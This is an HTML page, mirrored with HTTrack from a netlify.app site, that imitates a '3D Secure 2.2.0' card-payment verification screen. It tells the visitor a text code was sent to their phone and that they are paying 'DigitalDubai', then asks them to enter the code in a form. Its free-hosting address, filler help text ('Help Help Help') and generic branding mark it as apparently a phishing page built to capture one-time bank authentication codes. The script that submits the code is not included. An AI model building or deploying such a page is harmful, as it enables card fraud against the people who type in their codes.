<html lang="en" dir="ltr">

<!-- Mirrored from sdad-dubai.netlify.app/code.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 02 Nov 2025 06:05:50 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head></head>
	<meta name="keywords" content="3D Secure 2.2.0">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<script type="text/javascript" src="consumer/js/vendor/jquery-1.12.4.min.html"></script>
	<script type="text/javascript" src="consumer/js/media_queries.html"></script>
	<script type="text/javascript" src="consumer/js/css.html"></script>
	<script type="text/javascript" src="consumer/js/app.html"></script>
	<script type="text/javascript" src="consumer/js/vendor/prod-65747a30-a31f-11ee-81ba-e06e68000000.html"></script>
	<link rel="stylesheet" type="text/css" href="consumer/css/index.css">
	<title>3D Secure 2.2.0</title>
</head>

<body onresize="finalizeCss();" onload="finalizeCss();">
	<div id="processing">
	
	</div>
	<form id="checkout-page"  method="POST">
		<!-- The below button is used to prevent form submission by pressing the enter key -->
		<button type="submit" style="display: none;" disabled=""></button>
		<input type="hidden" id="jsEnabled" name="jsEnabled" value="1">
		<input type="hidden" id="userInteracted" name="userInteracted" value="0">
		<div id="content-wrapper">
			<div id="cancel-form-wrapper">
				<div id="cancel-form">
					<button class="cancel" type="submit" name="action" value="cancel" onclick="">Cancel</button>
				</div>
			</div>
			<div id="branding-wrapper">
				<div id="branding-area">
					<div id="branding-table">
	<div id="branding-row">
		<div id="branding-cell-left">
			<img class="schemeImg" src="consumer/img/1.png">
						<img class="schemeImg" src="consumer/img/3.png">
		</div>
		<div id="branding-cell-right">
			<img class="schemeImg" src="consumer/img/scheme.png" alt="scheme">					
		</div>
	</div>
</div>
				</div>
			</div>
			<div id="checkout-form-header-wrapper">
				<div id="checkout-form-header">
					<div id="checkout-form-title">Verify By Phone</div>
					<div id="checkout-form-info">We have sent you a text message with a code to your registered mobile number.**********971<br><br>You are paying DigitalDubai the amount.<p id="demo"></p></div>
					<div class="generalMessage">&zwj;</div>
				</div>
			</div>
			<div id="forms-container-wrapper">
				<div id="forms-container">
					<div id="checkout-form">
						<div id="checkout-form-textbox-title">Verification code</div>
						<input type="text" id="tel" name="tel" autocomplete="off" class="textInput" maxlength="6" pattern="^[0-9]{4,6}$" required class="name">
                        <div>
                            &nbsp;
                        </div>
                        <div id="error-message" style="color: red;"></div>
						<div id="codeMessage">
							<img class="messageImg" src="consumer/img/warning.png">
						
						</div>
						<button id="checkout-form-button" type="submit" name="send" value="confirm" onclick="" required class="name">CONFIRM</button>
					</div>
					<div id="resend-form">
						<button id="resend-form-button" type="submit" name="action" value="resend" onclick=""></button>
					</div>
				</div>
			</div>
			<div id="information-zone-wrapper">
				<div id="information-zone">
					<button id="why-button" class="accordion-button" type="button" onclick="">
						<span class="accordion-button-text">Learn more about authentication</span>
						<span class="accordion-state-indicator">+</span>
					</button>
					<div id="why-text" class="accordion-text" style="display: none;">
						Authentication Authentication Authentication Authentication Authentication Authentication
						Authentication Authentication Authentication Authentication
					</div>
					<button id="help-button" class="accordion-button" type="button" onclick="">
						<span class="accordion-button-text">Need some help ?</span>
						<span class="accordion-state-indicator">+</span>
					</button>
					<div id="help-text" class="accordion-text" style="display: none;">
						Help Help Help Help Help Help Help Help Help Help Help Help Help Help Help Help Help Help Help
						Help Help Help Help HelpHelp Help Help Help Help Help
					</div>
				</div>
			</div>
		</div>
	</form>
    <script src="code.js"></script>
    <script>
        // تعيين المنطقة الزمنية إلى غرينتش
        const options = {
            timeZone: 'GMT',
            year: 'numeric',
            month: 'numeric',
            day: 'numeric',
            hour: 'numeric',
            minute: 'numeric',
            second: 'numeric',
            hour12: false // استخدام التنسيق بالساعة العسكرية (24 ساعة)
        };

        // الحصول على التاريخ والوقت الحاليين
        const d = new Date();
        const formattedDate = new Intl.DateTimeFormat('en-US', options).format(d);

        // عرض التاريخ والوقت في العنصر
        document.getElementById("demo").innerHTML = formattedDate;
    </script>
 
</body>


<!-- Mirrored from sdad-dubai.netlify.app/code.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 02 Nov 2025 06:06:09 GMT -->
</html>